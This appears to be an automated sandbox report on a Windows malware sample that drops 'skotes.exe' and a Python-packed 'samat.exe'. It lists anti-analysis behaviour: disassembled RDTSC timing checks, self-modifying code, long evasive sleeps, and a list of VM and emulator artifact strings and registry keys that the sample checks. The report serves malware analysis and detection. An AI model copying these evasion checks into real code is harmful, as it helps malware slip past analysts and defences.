Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0831 second address: 52A0880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, A029h 0x00000011 pushfd 0x00000012 jmp 00007F8480743936h 0x00000017 sub ecx, 199D79F8h 0x0000001d jmp 00007F848074392Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0880 second address: 52A0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0886 second address: 52A088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A088A second address: 52A08D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F848150386Bh 0x00000015 add ax, EA6Eh 0x0000001a jmp 00007F8481503879h 0x0000001f popfd 0x00000020 mov eax, 2D75BFF7h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A08D0 second address: 52A0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ecx, 2E2E7239h 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 jmp 00007F8480743932h 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848074392Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0911 second address: 52A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0915 second address: 52A091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A091B second address: 52A0921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0921 second address: 52A0948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, dl 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0948 second address: 52A096A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F848150386Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A096A second address: 52A0986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 72E96C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8E281D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 966F64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 80E96C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9C281D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A46F64 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053203B3 rdtsc 0_2_053203B3
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 428 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1412 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 517 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2460 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe API coverage: 1.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5264 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352 Thread sleep count: 428 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5352 Thread sleep time: -856428s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084 Thread sleep count: 304 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5084 Thread sleep time: -9120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732 Thread sleep count: 1412 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1732 Thread sleep time: -2825412s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5736 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476 Thread sleep count: 517 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5476 Thread sleep time: -1034517s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528 Thread sleep count: 2460 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6528 Thread sleep time: -4922460s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3636 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7436 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7204 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 7_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 7_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 8_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 8_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF1230 GetSystemInfo, 8_2_00007FF8B7FF1230
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe
Source: samat.exe, 00000007.00000003.2990422238.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmusrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwaretray.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dqemu-ga.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dVMware SVGA 3D
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxtray.exe
Source: samat.exe, 00000008.00000002.4559869878.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4548533682.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmtoolsd.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxservice.exe
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dro.kernel.qemu
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware SVGA 3D
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Video
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmsrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dMicrosoft Hyper-V Video
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwareuser.exe
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ro.kernel.qemu
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
